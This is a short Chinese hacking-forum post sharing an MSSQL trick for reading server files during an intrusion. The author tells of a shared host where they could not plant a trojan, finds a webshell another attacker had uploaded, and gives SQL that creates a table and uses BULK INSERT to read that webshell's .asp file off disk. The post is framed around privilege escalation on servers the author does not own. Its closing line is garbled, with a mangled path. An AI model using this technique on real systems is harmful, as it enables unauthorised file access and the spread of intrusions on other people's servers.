MSSQL读取文件命令
各种提权
包括
:SA
:ROOT
主机是星外的 可以看到目标目录
数据库是ASP的 不能插马
无奈找了很多人都木有办法。。。
今天无聊中查看目录 发现有一个高人上传了一个WEBSHELL
在网上找到了办法 发现用MSSQL读取文件的办法 现在分享一下
Use www.xxx.com;–(这里是随便选的一个数据库)
drop table cmd;
create table cmd (a text);
BULK INSERT cmd
FROM ‘d:/freehos/webshell.cc.asp’
WITH (
FIELDTERMINATOR = ‘n’,
ROWTERMINATOR = ‘nn’
)
select * from cmd
这样就成功读出了d:/freehos/ www.xxx.com .asp